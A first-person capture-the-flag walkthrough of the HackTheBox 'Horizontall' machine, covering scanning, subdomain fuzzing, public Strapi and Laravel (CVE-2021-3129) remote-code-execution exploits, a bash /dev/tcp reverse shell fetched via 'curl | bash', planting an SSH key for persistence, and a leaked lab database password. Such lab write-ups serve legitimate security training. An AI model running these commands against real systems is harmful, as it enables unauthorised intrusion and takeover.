Horizontall HackTheBox WalkThrough
This is Horizontall HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
Horizontall HackTheBox machine. Before starting let us know something about this box. It is a
Linux OS box with IP address
10.10.11.105 and difficulty level
easy assigned by its maker.
First of all, connect your PC with
HackTheBox VPN and confirm your connectivity with Horizontall machine by pinging its IP
10.10.11.105. If all goes correct then it’s time to start hacking.
As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in
banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used
$ nmap (a popular Port Scanner) for this task and the result is given below: –
$ sudo nmap -sC -sV -p- -oN full-port.nmap 10.10.11.105
Full port scan with
nmap revealed port
80 as open.
OpenSSH 7.6p1 is running on port 22 and
nginx 1.14.0 web server is running on port 80. Googled for vulnerabilities in OpenSSH and Nginx but no any useful vulnerability found. Also, nmap script
http-title revealed a virtual host
horizontall.htb. So, before going further for any enumeration let us add horizontall.htb to our hosts file,
hosts file is located in the directory
Hosts File After Modification 1
$ cat /etc/hosts
On visiting the URL http://horizontall.htb/ got simple UI saying
Build website using HT. After checking the
source-code and other stuffs on the website, could not find any useful information.
So moved forward for Directory and Virtual Host bruteforcing. Directory bruteforcing with
$ dirsearch and wordlist
directory-list-2.3-medium.txt couldn’t find any useful file and folder. But, Virtual Host bruteforcing with
$ ffuf and wordlist
subdomains-top1million-110000.txt found a virtual host
$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c
Let us add
api-prod.horizontall.htb to our hosts file.
Hosts File After Modification 2
$ cat /etc/hosts
Ongoing to the URL http://api-prod.horizontall.htb/ found a simple page containing
Then directory brute forced on this subdomain using
$ dirsearch and wordlist
$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100
Directory bruteforcing revealed
reviews pages. Ongoing to http://api-prod.horizontall.htb/admin/ found the login page of
Then I googled for the version of
strapi CMS, vulnerabilities associated with them and how to find the version of strapi CMS being used. Luckily, got this link which shows how to find the version of strapi CMS. Following this link http://api-prod.horizontall.htb/admin/strapiVersion I found that the installed version of strapi is
Then a quick googling on the vulnerabilities of strapi CMS revealed that version
3.0.0-beta.17.4 is vulnerable to
Unauthenticated Remote Code Execution and its public exploit is also present. Check this link on
Tip: It is always a good idea to check the vulnerabilities associated with them whenever you get any software or framework version during enumeration phase in any CTF.
Remote Code Execution on Horizontall machine follow the steps below.
$ wget https://www.exploit-db.com/download/50239 -O exploit.py
$ python3 exploit.py http://api-prod.horizontall.htb
After successful exploitation we get an Authenticated JSON web token and credential
We can use this credential to login at URL http://api-prod.horizontall.htb/admin/. Since it is a
RCE that’s why we can’t see any output on screen. We can confirm it from above screenshot.
Checking Connectivity with Kali Machine
To confirm whether we can get a reverse shell on our Kali machine, we need to check the connectivity of horizontall machine with our Kali machine. For checking the connectivity, I pinged my Kali box from horizontall machine and it was pinging.
$> ping -c 3 10.10.16.7
$ sudo tcpdump -i tun0 icmp
Now its time to get reverse shell using some one liner. You can get a list of one liner from this link.
Getting User Shell
To get reverse shell follow the given steps :
On Kali Machine
In window 1
$ echo '#!/usr/bin/bash'>shell.sh
$ echo 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1'>>shell.sh # Don’t forget to replace the IP with your Kali machine IP
$ cat shell.sh
$ sudo python3 -m http.server 80
In window 2
$ nc -nvlp 9001
$ whoami && id
On Horizontall Machine
$> curl http://10.10.16.7/shell.sh | bash
We have successfully got user shell. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ CTRL + Z # to background the shell
$ stty raw -echo
$ fg # then 2 times enter to foreground the shell
$ export TERM=xterm-256color
$ stty -a | head -n1
$ stty rows 43 columns 174
Capture User Flag
$ cat /home/developer/user.txt
To escalate the privilege to root we have to first find a
privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some
post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I go for manual enumeration.
Finding PrivEsc Vector
$ ss -lnpt command revealed that ports
8000 are listening locally. There must be some services running over them.
MySQL server is running over port 3306. I tried to login into the server using the credential
#J!:F9Zt2uI. I got this credential from the file
database.json which is present in the directory
/opt/strapi/myapi/config/environments/development/. But there was no any useful information present in the databases.
When I tried to access port
1337 it didn’t respond. After accessing the service on port
8000 through the URL http://127.0.0.1:8000 found that the application running over this service is made of
$ curl http://127.0.0.1:8000 | grep -A3 -B4 -i "Laravel v8"
Soon I got information about the
Laravel immediately, I searched for the vulnerability and its exploit. After some research found that
Laravel (<=v8.4.2) is vulnerable to
Remote Code Execution when
debug mode is enabled. For more info about this vulnerability check the CVE
CVE-2021-3129. After checking the exploit at this URL found that it downloads
phpgcc library from the GitHub while it executes on vulnerable machine. Since
HackTheBox doesn’t have access to external Internet, so we can’t execute this exploit on horizontall machine. For this we have to
Local Port Forward port
8000 to our Kali machine, only then we can execute the exploit. Check last 5th line of code in below screenshot.
We will use
SSH for Local Port Forwarding. But we don’t have any SSH credential yet so we need to create one.
Since we have access to strapi user we can introduce our
SSH public key from our
id_rsa.pub file into the
authorized_keys file of user
strapi and then we can connect to horizontall machine using our
SSH private key viz.
id_rsa. So let us create a pair of RSA key using the command
On Kali Machine
$ cat ~/.ssh/id_rsa.pub
On Horizontall Machine
$ mkdir .ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqvcT8ZYbpNsiqZ53qceUd1JbnaugzrTrdFJm1Jpfn0YBdcFxMM4SLuLEANZ5kUJWS147CAgAbe2ufJT7HOPi09jjB9d21DcfcsiZA7NJ9rJU0g1PWXwUm1WyZIgoRGh3cOw+JnnampekaowAJyIDWZnBjSUjoybBGL8EfjdDXXTxoim/b8RP6vpjwJYrTJiuWFNDyHeIej4WCklr3TwuiAy7KZ67mn8ICRpNpdbndPwWajJbHKe2Ua3KX/gnk5wJOF1tCxtdZQ4qFPwvg4I5ZirIQDsfJ/JoperybYknHMiAGoL2GagXzwBuj6jgoFRDzkRQ9sT5lYZ5GObAijWEuThL+VclpRGb+LreCy13fLCb3upRT7tZFx7KPB0oSgpWU/RLvffoeKweKoLdSD8eIjbI/mOdbnNJVqAz/8HrbvtfcIfmDFCB8XcS7YhpItZFq6wPLhNr+xJuutTbVZcAXCHP4aVEtKAX2Q29tmNBcAgfDa2cdcKQXFFlbWikufLE= [email protected]">/opt/strapi/.ssh/authorized_keys
$ cat /opt/strapi/.ssh/authorized_keys
We have successfully transferred our public key to
authorized_keys of user
strapi on horizontall.
Local Port Forwarding
Let us login into the strapi SSH account using our
id_rsa key and Local Port Forward port 8000 to our kali machine.
$ chmod 400 ~/.ssh/id_rsa
$ ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 [email protected]
We can check the forwarded port using the command
$ ss -lnpt
Now we can access the service which is running over port 8000 on horizontall machine to port 8000 on our Kali machine using the URL http://localhost:8000/.
When I tried to escalate the privilege using this exploit I could easily perform privilege escalation. So here out potential PrivEsc vector is
Privilege Escalation by exploiting Vulnerable Software Version.
Getting Root by Privilege Escalation
To perform Privilege Escalation, follow the steps given at this URL or follow below steps.
$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
We can clearly see that we have successfully escalated the privilege to root as the output of
$ id command is
uid=0(root) gid=0(root) groups=0(root).
Capture Root Flag
Let us capture root flag.
$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
This was how I rooted Horizontall HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected]